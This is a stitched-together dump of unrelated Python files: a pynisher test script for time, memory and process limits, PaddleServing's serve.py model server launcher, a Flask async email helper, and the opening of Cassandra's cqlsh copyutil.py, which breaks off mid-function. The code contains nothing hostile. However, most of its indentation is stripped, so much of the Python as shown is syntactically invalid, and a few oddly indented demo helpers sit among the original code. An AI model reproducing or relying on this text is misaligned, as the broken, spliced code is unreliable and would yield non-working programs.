def nested_pynisher(level=2, cputime=5, walltime=5, memlimit = 10e24, increment = -1, grace_period = 1):
print("this is level {}".format(level))
if level == 0:
spawn_rogue_subprocess(10)
else:
func = pynisher.enforce_limits(mem_in_mb=memlimit, cpu_time_in_s=cputime, wall_time_in_s=walltime, grace_period_in_s = grace_period)(nested_pynisher)
func(level-1, None, walltime+increment, memlimit, increment)
def assertEqual(a, b):
assert a == b
def assertIsNone(a):
assert a is None
def assertTrue(a):
assert a
if __name__ == "__main__":
print("Testing capturing of output.")
time_limit = 2
grace_period = 1
wrapped_function = pynisher.enforce_limits(wall_time_in_s = time_limit, mem_in_mb=None, grace_period_in_s=grace_period, logger=logger, capture_output=True)(print_and_sleep)
wrapped_function(5)
assertTrue('0' in wrapped_function.stdout)
assertTrue(wrapped_function.stderr == '')
wrapped_function = pynisher.enforce_limits(wall_time_in_s = time_limit, mem_in_mb=None, grace_period_in_s=grace_period, logger=logger, capture_output=True)(print_and_fail)
wrapped_function()
assertTrue('0' in wrapped_function.stdout)
assertTrue('RuntimeError' in wrapped_function.stderr)
print("OK!")
print("Testing wall clock time constraint.")
local_mem_in_mb = None
local_wall_time_in_s = 1
local_cpu_time_in_s = None
local_grace_period = None
wrapped_function = pynisher.enforce_limits(mem_in_mb = local_mem_in_mb, wall_time_in_s=local_wall_time_in_s, cpu_time_in_s = local_cpu_time_in_s, grace_period_in_s = local_grace_period)(simulate_work)
for mem in range(1,10):
assertIsNone(wrapped_function(mem,10,0))
assertEqual(wrapped_function.exit_status, pynisher.TimeoutException)
print("OK!")
print("Testing cpu time constraint.")
cpu_time_in_s = 2
grace_period = 1
wrapped_function = pynisher.enforce_limits(cpu_time_in_s = cpu_time_in_s, grace_period_in_s = grace_period)(cpu_usage)
assertEqual(None,wrapped_function())
assertEqual(wrapped_function.exit_status, pynisher.CpuTimeoutException)
print("OK!")
print("Testing number of processes constraint.")
local_mem_in_mb = None
local_num_processes = 1
local_wall_time_in_s = None
local_grace_period = None
wrapped_function = pynisher.enforce_limits(mem_in_mb = local_mem_in_mb, wall_time_in_s=local_wall_time_in_s,num_processes = local_num_processes, grace_period_in_s = local_grace_period)(simulate_work)
for processes in [2,15,50,100,250]:
assertIsNone(wrapped_function(0,0, processes))
assertEqual(wrapped_function.exit_status, pynisher.SubprocessException)
print("OK!")
print("Testing unbounded function call which have to run through!")
local_mem_in_mb = None
local_wall_time_in_s = None
local_cpu_time_in_s = None
local_grace_period = None
wrapped_function = pynisher.enforce_limits(mem_in_mb = local_mem_in_mb, wall_time_in_s=local_wall_time_in_s, cpu_time_in_s = local_cpu_time_in_s, grace_period_in_s = local_grace_period)(simulate_work)
for mem in [1,2,4,8,16]:
assertEqual((mem,0,0),wrapped_function(mem,0,0))
assertEqual(wrapped_function.exit_status, 0)
print("OK!")
print("Testing memory constraint.")
local_mem_in_mb = 128
local_wall_time_in_s = None
local_cpu_time_in_s = None
local_grace_period = None
wrapped_function = pynisher.enforce_limits(mem_in_mb = local_mem_in_mb, wall_time_in_s=local_wall_time_in_s, cpu_time_in_s = local_cpu_time_in_s, grace_period_in_s = local_grace_period)(simulate_work)
for mem in [1024, 2048, 4096]:
assertIsNone(wrapped_function(mem,0,0))
print("OK!")
print("Testing an unexpected signal simulating a crash.")
wrapped_function = pynisher.enforce_limits()(crash_unexpectedly)
assertIsNone(wrapped_function(signal.SIGTERM))
assertEqual(wrapped_function.exit_status, pynisher.AnythingException)
print("OK!")
print("Testing big return values")
wrapped_function = pynisher.enforce_limits()(return_big_array)
for num_elements in [4,16,64, 256, 1024, 4096, 16384, 65536, 262144]:
bla = wrapped_function(num_elements)
assertEqual(len(bla), num_elements)
# wrapped_function = pynisher.enforce_limits(wall_time_in_s = 1)(spawn_rogue_subprocess)
# wrapped_function(5)
# time.sleep(1)
# p = psutil.Process()
# assertEqual(len(p.children(recursive=True)), 0)
wrapped_function = pynisher.enforce_limits(wall_time_in_s = 2)(svm_example)
start = time.time()
wrapped_function(16384, 128)
duration = time.time()-start
time.sleep(1)
p = psutil.Process()
assertEqual(len(p.children(recursive=True)), 0)
assertTrue(duration < 2.1)
time_limit = 2
grace_period = 1
wrapped_function = pynisher.enforce_limits(cpu_time_in_s = time_limit, mem_in_mb=None, grace_period_in_s=grace_period, logger=logger)(svc_example)
wrapped_function(16384, 1000)
time.sleep(1)
p = psutil.Process()
assertEqual(len(p.children(recursive=True)), 0)
# fails with pynisher.AnythingException for some reason
assertEqual(wrapped_function.exit_status, pynisher.CpuTimeoutException)
# assertTrue(duration > time_limit-0.1)
# assertTrue(duration < time_limit+grace_period+0.1)
tl = 2 #time limit
gp = 1 #grace period
start = time.time()
nested_pynisher(level=2, cputime = 2, walltime = 2, memlimit = None, increment = 1, grace_period = gp)
duration = time.time()-start
print(duration)
time.sleep(1)
p = psutil.Process()
assertEqual(len(p.children(recursive=True)), 0)
assertTrue(duration > tl-0.1)
assertTrue(duration < tl+gp+0.1)
print("OK!")
|
serve.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage:
Host a trained paddle model with a one-line command
Example:
python -m paddle_serving_server.serve --model ./serving_server_model --port 9292
"""
import argparse
import os
import json
import base64
import time
from multiprocessing import Process
import sys
if sys.version_info.major == 2:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
elif sys.version_info.major == 3:
from http.server import BaseHTTPRequestHandler, HTTPServer
from contextlib import closing
import socket
from paddle_serving_server.env import CONF_HOME
import signal
from paddle_serving_server.util import *
from paddle_serving_server.env_check.run import *
# web_service.py is still used by Pipeline.
def port_is_available(port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('127.0.0.1', port))
if result != 0:
return True
else:
return False
def format_gpu_to_strlist(unformatted_gpus):
gpus_strlist = []
if isinstance(unformatted_gpus, int):
gpus_strlist = [str(unformatted_gpus)]
elif isinstance(unformatted_gpus, list):
if unformatted_gpus == [""]:
gpus_strlist = ["-1"]
elif len(unformatted_gpus) == 0:
gpus_strlist = ["-1"]
else:
gpus_strlist = [str(x) for x in unformatted_gpus]
elif isinstance(unformatted_gpus, str):
if unformatted_gpus == "":
gpus_strlist = ["-1"]
else:
gpus_strlist = [unformatted_gpus]
elif unformatted_gpus == None:
gpus_strlist = ["-1"]
else:
raise ValueError("error input of set_gpus")
# check cuda visible
if "CUDA_VISIBLE_DEVICES" in os.environ:
env_gpus = os.environ["CUDA_VISIBLE_DEVICES"].split(",")
for op_gpus_str in gpus_strlist:
op_gpu_list = op_gpus_str.split(",")
# op_gpu_list == ["-1"] means this op use CPU
# so don`t check cudavisible.
if op_gpu_list == ["-1"]:
continue
for ids in op_gpu_list:
if ids not in env_gpus:
print("gpu_ids is not in CUDA_VISIBLE_DEVICES.")
exit(-1)
# check gpuid is valid
for op_gpus_str in gpus_strlist:
op_gpu_list = op_gpus_str.split(",")
use_gpu = False
for ids in op_gpu_list:
if int(ids) < -1:
raise ValueError("The input of gpuid error.")
if int(ids) >= 0:
use_gpu = True
if int(ids) == -1 and use_gpu:
raise ValueError("You can not use CPU and GPU in one model.")
return gpus_strlist
def is_gpu_mode(unformatted_gpus):
gpus_strlist = format_gpu_to_strlist(unformatted_gpus)
for op_gpus_str in gpus_strlist:
op_gpu_list = op_gpus_str.split(",")
for ids in op_gpu_list:
if int(ids) >= 0:
return True
return False
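# Hypothetical examples of the gpu id conventions handled above, not part of the
# original script: "-1" means CPU, and a comma-separated string groups several
# cards for one op. Assumes CUDA_VISIBLE_DEVICES is unset or includes these ids.
def _example_gpu_id_formats():
    assert format_gpu_to_strlist("") == ["-1"]           # empty string -> CPU
    assert format_gpu_to_strlist(0) == ["0"]             # single int -> one card
    assert format_gpu_to_strlist(["0,1", "2"]) == ["0,1", "2"]
    assert is_gpu_mode("-1") is False
    assert is_gpu_mode(["0,1"]) is True
    return True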
def serve_args():
parser = argparse.ArgumentParser("serve")
parser.add_argument(
"server",
type=str,
default="start",
nargs="?",
help="stop or start PaddleServing, check running environemnt")
parser.add_argument(
"--thread",
type=int,
default=4,
help="Concurrency of server,[4,1024]",
choices=range(4, 1025))
parser.add_argument(
"--port", type=int, default=9393, help="Port of the starting gpu")
parser.add_argument(
"--device", type=str, default="cpu", help="Type of device")
parser.add_argument(
"--gpu_ids", type=str, default="", nargs="+", help="gpu ids")
parser.add_argument(
"--runtime_thread_num",
type=int,
default=0,
nargs="+",
help="Number of each op")
parser.add_argument(
"--batch_infer_size",
type=int,
default=32,
nargs="+",
help="Max batch of each op")
parser.add_argument(
"--model", type=str, default="", nargs="+", help="Model for serving")
parser.add_argument(
"--op", type=str, default="", nargs="+", help="Model for serving")
parser.add_argument(
"--workdir",
type=str,
default="workdir",
help="Working dir of current service")
parser.add_argument(
"--use_mkl", default=False, action="store_true", help="Use MKL")
parser.add_argument(
"--precision",
type=str,
default="fp32",
help="precision mode(fp32, int8, fp16, bf16)")
parser.add_argument(
"--use_calib",
default=False,
action="store_true",
help="Use TensorRT Calibration")
parser.add_argument(
"--mem_optim_off",
default=False,
action="store_true",
help="Memory optimize")
parser.add_argument(
"--ir_optim", default=False, action="store_true", help="Graph optimize")
parser.add_argument(
"--max_body_size",
type=int,
default=512 * 1024 * 1024,
help="Limit sizes of messages")
parser.add_argument(
"--use_encryption_model",
default=False,
action="store_true",
help="Use encryption model")
parser.add_argument(
"--use_trt", default=False, action="store_true", help="Use TensorRT")
parser.add_argument(
"--use_lite", default=False, action="store_true", help="Use PaddleLite")
parser.add_argument(
"--use_xpu", default=False, action="store_true", help="Use XPU")
parser.add_argument(
"--use_ascend_cl",
default=False,
action="store_true",
help="Use Ascend CL")
parser.add_argument(
"--product_name",
type=str,
default=None,
help="product_name for authentication")
parser.add_argument(
"--container_id",
type=str,
default=None,
help="container_id for authentication")
parser.add_argument(
"--gpu_multi_stream",
default=False,
action="store_true",
help="Use gpu_multi_stream")
parser.add_argument(
"--enable_prometheus", default=False, action="store_true", help="Use Prometheus")
parser.add_argument(
"--prometheus_port", type=int, default=19393, help="Port of the Prometheus")
return parser.parse_args()
def start_gpu_card_model(gpu_mode, port, args): # pylint: disable=doc-string-missing
device = "cpu"
if gpu_mode == True:
device = "gpu"
import paddle_serving_server as serving
op_maker = serving.OpMaker()
op_seq_maker = serving.OpSeqMaker()
server = serving.Server()
thread_num = args.thread
model = args.model
mem_optim = args.mem_optim_off is False
ir_optim = args.ir_optim
use_mkl = args.use_mkl
max_body_size = args.max_body_size
workdir = "{}_{}".format(args.workdir, port)
dag_list_op = []
if model == "":
print("You must specify your serving model")
exit(-1)
for single_model_config in args.model:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError("The input of --model should be a dir not file.")
# If custom OPs are passed via --op (e.g. --op GeneralDetectionOp GeneralRecOp),
# add any OPs that are not already known to the op list used for the DAG and the model,
# and record the order in which they were passed in dag_list_op.
if args.op != "":
for single_op in args.op:
temp_str_list = single_op.split(':')
if len(temp_str_list) >= 1 and temp_str_list[0] != '':
if temp_str_list[0] not in op_maker.op_list:
op_maker.op_list.append(temp_str_list[0])
if len(temp_str_list) >= 2 and temp_str_list[1] == '0':
pass
else:
server.default_engine_types.append(temp_str_list[0])
dag_list_op.append(temp_str_list[0])
read_op = op_maker.create('GeneralReaderOp')
op_seq_maker.add_op(read_op)
# If dag_list_op is not empty, custom OPs or a custom DAG chain were passed via --op.
# In that case, build the DAG chain in the order the OPs were passed to --op.
if len(dag_list_op) > 0:
for single_op in dag_list_op:
op_seq_maker.add_op(op_maker.create(single_op))
# Otherwise, chain the ops based on --model, as before.
else:
for idx, single_model in enumerate(model):
infer_op_name = "GeneralInferOp"
# Currently the OCR Det-model node depends on the third-party OpenCV library.
# OpenCV is only linked in, and GeneralDetectionOp compiled, when OCR is used,
# so this is special-cased here: unless the condition below holds, the added op
# defaults to GeneralInferOp. In the future this configuration may no longer be
# generated from a Python script at all.
if len(model) == 2 and idx == 0 and single_model == "ocr_det_model":
infer_op_name = "GeneralDetectionOp"
else:
infer_op_name = "GeneralInferOp"
general_infer_op = op_maker.create(infer_op_name)
op_seq_maker.add_op(general_infer_op)
general_response_op = op_maker.create('GeneralResponseOp')
op_seq_maker.add_op(general_response_op)
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.use_mkl(use_mkl)
server.set_precision(args.precision)
server.set_use_calib(args.use_calib)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.set_max_body_size(max_body_size)
server.set_enable_prometheus(args.enable_prometheus)
server.set_prometheus_port(args.prometheus_port)
if args.use_trt and device == "gpu":
server.set_trt()
server.set_ir_optimize(True)
if args.gpu_multi_stream and device == "gpu":
server.set_gpu_multi_stream()
if args.runtime_thread_num:
server.set_runtime_thread_num(args.runtime_thread_num)
if args.batch_infer_size:
server.set_batch_infer_size(args.batch_infer_size)
if args.use_lite:
server.set_lite()
server.set_device(device)
if args.use_xpu:
server.set_xpu()
if args.use_ascend_cl:
server.set_ascend_cl()
if args.product_name != None:
server.set_product_name(args.product_name)
if args.container_id != None:
server.set_container_id(args.container_id)
if gpu_mode == True or args.use_xpu or args.use_ascend_cl:
server.set_gpuid(args.gpu_ids)
server.load_model_config(model)
server.prepare_server(
workdir=workdir,
port=port,
device=device,
use_encryption_model=args.use_encryption_model)
server.run_server()
def start_multi_card(args, serving_port=None): # pylint: disable=doc-string-missing
if serving_port == None:
serving_port = args.port
if args.use_lite:
print("run using paddle-lite.")
start_gpu_card_model(False, serving_port, args)
else:
start_gpu_card_model(is_gpu_mode(args.gpu_ids), serving_port, args)
class MainService(BaseHTTPRequestHandler):
def get_available_port(self):
default_port = 12000
for i in range(1000):
if port_is_available(default_port + i):
return default_port + i
def start_serving(self):
start_multi_card(args, serving_port)
def get_key(self, post_data):
if "key" not in post_data:
return False
else:
key = base64.b64decode(post_data["key"].encode())
for single_model_config in args.model:
if os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
with open(single_model_config + "/key", "wb") as f:
f.write(key)
return True
def check_key(self, post_data):
if "key" not in post_data:
return False
else:
key = base64.b64decode(post_data["key"].encode())
for single_model_config in args.model:
if os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
with open(single_model_config + "/key", "rb") as f:
cur_key = f.read()
if key != cur_key:
return False
return True
def start(self, post_data):
post_data = json.loads(post_data.decode('utf-8'))
global p_flag
if not p_flag:
if args.use_encryption_model:
print("waiting key for model")
if not self.get_key(post_data):
print("not found key in request")
return False
global serving_port
global p
serving_port = self.get_available_port()
p = Process(target=self.start_serving)
p.start()
time.sleep(3)
if p.is_alive():
p_flag = True
else:
return False
else:
if p.is_alive():
if not self.check_key(post_data):
return False
else:
return False
return True
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
if self.start(post_data):
response = {"endpoint_list": [serving_port]}
else:
response = {"message": "start serving failed"}
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(response).encode())
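# Illustrative client sketch: it shows how a caller could POST a base64 encoded
# model key to the MainService above and read the serving port back. The host,
# port and key file path used here are hypothetical example values.
def _demo_send_model_key(host="127.0.0.1", port=9393, key_path="./key"):
    import base64 as b64
    import json as js
    import urllib.request as urlrequest
    # Read the raw key and base64 encode it; MainService.get_key() b64-decodes the
    # "key" field before writing it next to each model directory.
    with open(key_path, "rb") as f:
        encoded_key = b64.b64encode(f.read()).decode()
    body = js.dumps({"key": encoded_key}).encode("utf-8")
    req = urlrequest.Request(
        "http://{}:{}".format(host, port),
        data=body,
        headers={"Content-Type": "application/json"})
    with urlrequest.urlopen(req) as resp:
        # On success the response carries {"endpoint_list": [serving_port]}.
        print(js.loads(resp.read().decode("utf-8")))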
def stop_serving(command: str, port: int=None):
'''
Stop PaddleServing by port.
Args:
command(str): stop->SIGINT, kill->SIGKILL
port(int): Default to None, kill all processes in ProcessInfo.json.
Not None, kill the specific process relating to port
Returns:
True if stop serving successfully.
False if an error occurred
Examples:
.. code-block:: python
stop_serving("stop", 9494)
'''
filepath = os.path.join(CONF_HOME, "ProcessInfo.json")
infoList = load_pid_file(filepath)
if infoList is False:
return False
lastInfo = infoList[-1]
for info in infoList:
storedPort = info["port"]
pid = info["pid"]
model = info["model"]
start_time = info["start_time"]
if port is not None:
if port in storedPort:
kill_stop_process_by_pid(command, pid)
infoList.remove(info)
if len(infoList):
with open(filepath, "w") as fp:
json.dump(infoList, fp)
else:
os.remove(filepath)
return True
else:
if lastInfo == info:
raise ValueError(
"Please confirm the port [%s] you specified is correct."
% port)
else:
pass
else:
kill_stop_process_by_pid(command, pid)
if lastInfo == info:
os.remove(filepath)
return True
if __name__ == "__main__":
# args.device is not used at all; it is kept only for interface compatibility,
# so --device should not be recommended on the home page.
args = serve_args()
if args.server == "stop" or args.server == "kill":
result = 0
if "--port" in sys.argv:
result = stop_serving(args.server, args.port)
else:
result = stop_serving(args.server)
if result:
os._exit(0)
else:
os._exit(-1)
elif args.server == "check":
check_env()
os._exit(0)
for single_model_config in args.model:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError("The input of --model should be a dir not file.")
if port_is_available(args.port):
portList = [args.port]
dump_pid_file(portList, args.model)
if args.use_encryption_model:
p_flag = False
p = None
serving_port = 0
server = HTTPServer(('0.0.0.0', int(args.port)), MainService)
print(
'Starting encryption server, waiting for key from client, use <Ctrl-C> to stop'
)
server.serve_forever()
else:
start_multi_card(args)
|
email.py
|
from flask_mail import Message
from flask import current_app
from app import mail
from threading import Thread
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start()
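# Minimal usage sketch, assuming the `app` package also exposes the Flask
# application instance as `app`; the addresses below are hypothetical examples.
if __name__ == '__main__':
    from app import app as flask_app
    with flask_app.app_context():
        send_email('Test message', 'noreply@example.com',
                   ['user@example.com'], 'Hello from the async mailer.')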
|
copyutil.py
|
# cython: profile=True
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import csv
import datetime
import json
import glob
import multiprocessing as mp
import os
import platform
import random
import re
import signal
import six
import struct
import sys
import threading
import time
import traceback
from bisect import bisect_right
from calendar import timegm
from collections import defaultdict, namedtuple
from decimal import Decimal
from random import randint
from io import BytesIO, StringIO
from select import select
from uuid import UUID
from .util import profile_on, profile_off
from six import ensure_str, ensure_text
from six.moves import configparser
from six.moves import range
from six.moves.queue import Queue
from cassandra import OperationTimedOut
from cassandra.cluster import Cluster, DefaultConnection
from cassandra.cqltypes import ReversedType, UserType, BytesType, VarcharType
from cassandra.metadata import protect_name, protect_names, protect_value
from cassandra.policies import RetryPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy, FallthroughRetryPolicy
from cassandra.query import BatchStatement, BatchType, SimpleStatement, tuple_factory
from cassandra.util import Date, Time
from cqlshlib.util import profile_on, profile_off
from cqlshlib.cql3handling import CqlRuleSet
from cqlshlib.displaying import NO_COLOR_MAP
from cqlshlib.formatting import format_value_default, CqlType, DateTimeFormat, EMPTY, get_formatter, BlobType
from cqlshlib.sslhandling import ssl_settings
PROFILE_ON = False
STRACE_ON = False
DEBUG = False # This may be set to True when initializing the task
IS_LINUX = platform.system() == 'Linux'
CopyOptions = namedtuple('CopyOptions', 'copy dialect unrecognized')
def safe_normpath(fname):
"""
:return: the normalized path, but only if there is a file name; we don't want to convert
an empty string (which means no file name) to a dot. Also expands any user variables such as ~ to the full path.
"""
return os.path.normpath(os.path.expanduser(fname)) if fname else fname
def printdebugmsg(msg):
if DEBUG:
printmsg(msg)
def printmsg(msg, eol='\n', encoding='utf8'):
sys.stdout.write(msg)
sys.stdout.write(eol)
sys.stdout.flush()
# Keep arguments in sync with printmsg
def swallowmsg(msg, eol='', encoding=''):
pass
class OneWayPipe(object):
"""
A one way pipe protected by two process level locks, one for reading and one for writing.
"""
def __init__(self):
self.reader, self.writer = mp.Pipe(duplex=False)
self.rlock = mp.Lock()
self.wlock = mp.Lock()
def send(self, obj):
with self.wlock:
self.writer.send(obj)
def recv(self):
with self.rlock:
return self.reader.recv()
def close(self):
self.reader.close()
self.writer.close()
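# Minimal usage sketch: send() and recv() go over the underlying multiprocessing
# pipe and are serialized by the write and read locks, so several processes can
# safely share one end each. The payload below is just an example value.
def _demo_one_way_pipe():
    pipe = OneWayPipe()
    pipe.send({'rows': 3})   # writer end, guarded by wlock
    print(pipe.recv())       # reader end, guarded by rlock
    pipe.close()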
class ReceivingChannel(object):
"""
A one way channel that wraps a pipe to receive messages.
"""
def __init__(self, pipe):
self.pipe = pipe
def recv(self):
return self.pipe.recv()
def close(self):
self.pipe.close()
class SendingChannel(object):
"""
A one way channel that wraps a pipe and provides a feeding thread to send messages asynchronously.
"""
def __init__(self, pipe):
self.pipe = pipe
self.pending_messages = Queue()
def feed():
while True:
try:
msg = self.pending_messages.get()
self.pipe.send(msg)
except Exception as e:
printmsg('%s: %s' % (e.__class__.__name__, e.message if hasattr(e, 'message') else str(e)))
feeding_thread = threading.Thread(target=feed)
feeding_thread.daemon = True
feeding_thread.start()
def send(self, obj):
self.pending_messages.put(obj)
def num_pending(self):
return self.pending_messages.qsize() if self.pending_messages else 0
def close(self):
self.pipe.close()
class SendingChannels(object):
"""
A group of one way channels for sending messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in range(num_channels)]
self.channels = [SendingChannel(p) for p in self.pipes]
self.num_channels = num_channels
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class ReceivingChannels(object):
"""
A group of one way channels for receiving messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in range(num_channels)]
self.channels = [ReceivingChannel(p) for p in self.pipes]
self._readers = [p.reader for p in self.pipes]
self._rlocks = [p.rlock for p in self.pipes]
self._rlocks_by_readers = dict([(p.reader, p.rlock) for p in self.pipes])
self.num_channels = num_channels
self.recv = self.recv_select if IS_LINUX else self.recv_polling
def recv_select(self, timeout):
"""
Implementation of the recv method for Linux, where select is available. Receive an object from
all pipes that are ready for reading without blocking.
"""
readable, _, _ = select(self._readers, [], [], timeout)
for r in readable:
with self._rlocks_by_readers[r]:
try:
yield r.recv()
except EOFError:
continue
def recv_polling(self, timeout):
"""
Implementation of the recv method for platforms where select() is not available for pipes.
We poll on all of the readers with a very small timeout. We stop once the specified timeout
has elapsed, but we may exceed it since we check all readers during each sweep.
"""
start = time.time()
while True:
for i, r in enumerate(self._readers):
with self._rlocks[i]:
if r.poll(0.000000001):
try:
yield r.recv()
except EOFError:
continue
if time.time() - start > timeout:
break
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
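# Minimal usage sketch: recv() is a generator that yields whatever messages are
# already available on any channel within the timeout, using select() on Linux
# and polling elsewhere. Writing directly to channels.pipes[0] here only stands
# in for what a worker process would normally do.
def _demo_receiving_channels():
    channels = ReceivingChannels(2)
    channels.pipes[0].send('hello from worker 0')
    for msg in channels.recv(timeout=0.1):
        print(msg)
    channels.close()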
class CopyTask(object):
"""
A base class for ImportTask and ExportTask
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, direction):
self.shell = shell
self.ks = ks
self.table = table
self.table_meta = self.shell.get_table_meta(self.ks, self.table)
self.host = shell.conn.get_control_connection_host()
self.fname = safe_normpath(fname)
self.protocol_version = protocol_version
self.config_file = config_file
# if cqlsh is invoked with --debug then set the global debug flag to True
if shell.debug:
global DEBUG
DEBUG = True
# do not display messages when exporting to STDOUT unless --debug is set
self.printmsg = printmsg if self.fname is not None or direction == 'from' or DEBUG \
else swallowmsg
self.options = self.parse_options(opts, direction)
self.num_processes = self.options.copy['numprocesses']
self.encoding = self.options.copy['encoding']
self.printmsg('Using %d child processes' % (self.num_processes,))
if direction == 'from':
self.num_processes += 1 # add the feeder process
self.processes = []
self.inmsg = ReceivingChannels(self.num_processes)
self.outmsg = SendingChannels(self.num_processes)
self.columns = CopyTask.get_columns(shell, ks, table, columns)
self.time_start = time.time()
def maybe_read_config_file(self, opts, direction):
"""
Read optional sections from a configuration file that was specified in the command options or from the default
cqlshrc configuration file if none was specified.
"""
config_file = opts.pop('configfile', '')
if not config_file:
config_file = self.config_file
if not os.path.isfile(config_file):
return opts
configs = configparser.RawConfigParser()
configs.read(config_file)
ret = dict()
config_sections = list(['copy', 'copy-%s' % (direction,),
'copy:%s.%s' % (self.ks, self.table),
'copy-%s:%s.%s' % (direction, self.ks, self.table)])
for section in config_sections:
if configs.has_section(section):
options = dict(configs.items(section))
self.printmsg("Reading options from %s:[%s]: %s" % (config_file, section, options))
ret.update(options)
# Update this last so the command line options take precedence over the configuration file options
if opts:
self.printmsg("Reading options from the command line: %s" % (opts,))
ret.update(opts)
if self.shell.debug: # this is important for testing, do not remove
self.printmsg("Using options: '%s'" % (ret,))
return ret
@staticmethod
def clean_options(opts):
"""
Convert all option values to valid string literals unless they are path names
"""
return dict([(k, v if k in ['errfile', 'ratefile'] else ensure_str(v))
for k, v in opts.items()])
def parse_options(self, opts, direction):
"""
Parse options for import (COPY FROM) and export (COPY TO) operations.
Extract from opts csv and dialect options.
:return: 3 dictionaries: the csv options, the dialect options, any unrecognized options.
"""
shell = self.shell
opts = self.clean_options(self.maybe_read_config_file(opts, direction))
dialect_options = dict()
dialect_options['quotechar'] = ensure_str(opts.pop('quote', '"'))
dialect_options['escapechar'] = ensure_str(opts.pop('escape', '\\'))
dialect_options['delimiter'] = ensure_str(opts.pop('delimiter', ','))
if dialect_options['quotechar'] == dialect_options['escapechar']:
dialect_options['doublequote'] = True
del dialect_options['escapechar']
else:
dialect_options['doublequote'] = False
copy_options = dict()
copy_options['nullval'] = ensure_str(opts.pop('null', ''))
copy_options['header'] = bool(opts.pop('header', '').lower() == 'true')
copy_options['encoding'] = opts.pop('encoding', 'utf8')
copy_options['maxrequests'] = int(opts.pop('maxrequests', 6))
copy_options['pagesize'] = int(opts.pop('pagesize', 1000))
# by default the page timeout is 10 seconds per 1000 entries
# in the page size or 10 seconds if pagesize is smaller
copy_options['pagetimeout'] = int(opts.pop('pagetimeout', max(10, 10 * (copy_options['pagesize'] / 1000))))
copy_options['maxattempts'] = int(opts.pop('maxattempts', 5))
copy_options['dtformats'] = DateTimeFormat(opts.pop('datetimeformat', shell.display_timestamp_format),
shell.display_date_format, shell.display_nanotime_format,
milliseconds_only=True)
copy_options['floatprecision'] = int(opts.pop('floatprecision', '5'))
copy_options['doubleprecision'] = int(opts.pop('doubleprecision', '12'))
copy_options['chunksize'] = int(opts.pop('chunksize', 5000))
copy_options['ingestrate'] = int(opts.pop('ingestrate', 100000))
copy_options['maxbatchsize'] = int(opts.pop('maxbatchsize', 20))
copy_options['minbatchsize'] = int(opts.pop('minbatchsize', 10))
copy_options['reportfrequency'] = float(opts.pop('reportfrequency', 0.25))
copy_options['consistencylevel'] = shell.consistency_level
copy_options['decimalsep'] = opts.pop('decimalsep', '.')
copy_options['thousandssep'] = opts.pop('thousandssep', '')
copy_options['boolstyle'] = [ensure_str(s.strip()) for s in opts.pop('boolstyle', 'True, False').split(',')]
copy_options['numprocesses'] = int(opts.pop('numprocesses', self.get_num_processes(16)))
copy_options['begintoken'] = opts.pop('begintoken', '')
copy_options['endtoken'] = opts.pop('endtoken', '')
copy_options['maxrows'] = int(opts.pop('maxrows', '-1'))
copy_options['skiprows'] = int(opts.pop('skiprows', '0'))
copy_options['skipcols'] = opts.pop('skipcols', '')
copy_options['maxparseerrors'] = int(opts.pop('maxparseerrors', '-1'))
copy_options['maxinserterrors'] = int(opts.pop('maxinserterrors', '1000'))
copy_options['errfile'] = safe_normpath(opts.pop('errfile', 'import_%s_%s.err' % (self.ks, self.table,)))
copy_options['ratefile'] = safe_normpath(opts.pop('ratefile', ''))
copy_options['maxoutputsize'] = int(opts.pop('maxoutputsize', '-1'))
copy_options['preparedstatements'] = bool(opts.pop('preparedstatements', 'true').lower() == 'true')
copy_options['ttl'] = int(opts.pop('ttl', -1))
# Hidden properties, they do not appear in the documentation but can be set in config files
# or on the cmd line but w/o completion
copy_options['maxinflightmessages'] = int(opts.pop('maxinflightmessages', '512'))
copy_options['maxbackoffattempts'] = int(opts.pop('maxbackoffattempts', '12'))
copy_options['maxpendingchunks'] = int(opts.pop('maxpendingchunks', '24'))
# set requesttimeout to a value high enough so that maxbatchsize rows will never timeout if the server
# responds: here we set it to 1 sec per 10 rows but no less than 60 seconds
copy_options['requesttimeout'] = int(opts.pop('requesttimeout', max(60, 1 * copy_options['maxbatchsize'] / 10)))
# set childtimeout higher than requesttimeout so that child processes have a chance to report request timeouts
